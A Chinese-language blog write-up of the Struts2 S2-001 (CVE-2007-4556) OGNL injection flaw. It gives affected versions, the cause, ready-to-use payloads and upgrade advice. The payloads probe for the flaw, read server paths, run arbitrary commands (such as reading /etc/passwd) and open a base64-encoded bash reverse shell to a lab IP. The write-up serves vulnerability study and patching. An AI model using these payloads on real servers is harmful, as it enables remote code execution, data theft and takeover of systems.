首页 > 其他分享 >CVE-2007-4556 s2-001

CVE-2007-4556 s2-001

时间:2023-01-06 18:45:38浏览次数:72  
标签:lang java s2 getWriter 001 4556 new 2.0 WebWork

漏洞名称

S2-001 远程代码执行

利用条件

WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 - WebWork 2.2.5, Struts 2.0.0 - Struts 2.0.8

不受影响的版本:WebWork 2.0, WebWork 2.1 (with altSyntax disabled, which is the default)

漏洞原理

该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。

漏洞利用

1.漏洞检测

对漏洞点进行测试,首先在输入框输入%{1+1}测试是否能执行

image-20221228114223379

image-20221228114235672

2.利用

2.1获取tomcat路径

%{"tomcatBinDir{"[email protected]@getProperty("user.dir")+"}"}

image-20221228114614367

获得 Tomcat 执行路径:tomcatBinDir{/usr/local/tomcat}

image-20221228114630856

2.2获取Web路径

%{ #[email protected]@getRequest(), #response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(), #response.println(#req.getRealPath('/')), #response.flush(), #response.close() }

image-20221228143640968

image-20221228143614472

2.3任意命令执行

%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.io.InputStreamReader(#b), #d=new java.io.BufferedReader(#c), #e=new char[50000], #d.read(#e), #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"), #f.getWriter().println(new java.lang.String(#e)), #f.getWriter().flush(),#f.getWriter().close() }

替换其中的whoami即可执行命令,若存在空格,则写作:{"cat","/etc/passwd"}形式

image-20221228143815067

image-20221228143827217

2.4反弹shell

bash","-c","{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMjAwLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}
%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"bash","-c","{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNTYuMjAwLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.io.InputStreamReader(#b), #d=new java.io.BufferedReader(#c), #e=new char[50000], #d.read(#e), #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"), #f.getWriter().println(new java.lang.String(#e)), #f.getWriter().flush(),#f.getWriter().close() }

image-20221228155053598

image-20221228155213364

image-20221228155315741

修复建议

改变ognl表达式的解析方法从而不会产生递归解析,用户的输入也不会再解析执行。

开发人员应立即升级到 Struts 2.0.9 或升级到 XWork 2.0.4

参考文章

https://blog.csdn.net/weixin_44037296/article/details/119142113

标签:lang,java,s2,getWriter,001,4556,new,2.0,WebWork
From: https://www.cnblogs.com/crayonxiaoxin/p/17031345.html

相关文章

  • s2-005
    漏洞名称(CVE-2010-1870)-XWorkParameterInterceptors旁路允许远程命令执行利用条件Struts2.0.0-Struts2.1.8.1漏洞原理s2-005漏洞的起源源于S2-003(受影响版......
  • s2-007
    漏洞名称S2-007CVE-2012-0838远程代码执行利用条件Struts2.0.0-Struts2.2.3漏洞原理age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ong......
  • S2-008
    漏洞名称S2-008(CVE-2012-0392)远程代码执行漏洞利用条件Struts2.0.0-Struts2.3.17漏洞原理S2-008涉及多个漏洞,Cookie拦截器错误配置可造成OGNL表达式执行,但......
  • S2-009 CVE-2011-3923
    漏洞名称CVE-2011-3923S2-009远程代码执行漏洞利用条件Struts2.0.0-Struts2.3.1.1漏洞原理OGNL提供了广泛的表达式评估功能等功能。该漏洞允许恶意用户绕过Para......
  • Strus2_Action中访问Web资源
    1.什么是web资源?如:HttpServletRequest,HttpSession,ServletContext等原生的ServletAPI2.为什么访问web资源?B/S架构的应用的controller中,必然需要访问web资源,域对象中读写属性,......
  • S2 - Lesson 15 - Good news
    Words secretsecretary nervous[紧张的]nerveirritable[易怒的]  affordcan/beableto+afford+sth./todosth.Thefirmcouldnotaffordtopaysu......
  • S2 - Lesson 14 - Do you speak English?
    Words amusing experienceanamusingexperience wave liftasksb.foralift replyv.replytosb.  languagethesamelanguagebodylanguage......
  • spring boot——spring boot的基本配置——spring boot整合mybatis——本地实例运行—
            pojo类:packageorg.example.entity;publicclassMyUser{privateintid;privateStringname;privateintage;publ......
  • ros2的cv_bridge库opencv版本不匹配问题
    ros2的cv_bridge库opencv版本不匹配问题问题:libopencv_imgcodecs.so.4.2:cannotopensharedobjectfile:nosuchfileordirectory原因ros安装的时候默认的......
  • cocos2d-x基于windows平台交叉编辑android工程
    cocos2d-x确实是一款优秀的引擎,尽管和正规军的unity3d比起来它显得有点土,但它在移动平台上的性能表现着实惊艳。以下讲解如何将win32工程交叉编译到android平台。 一、环境......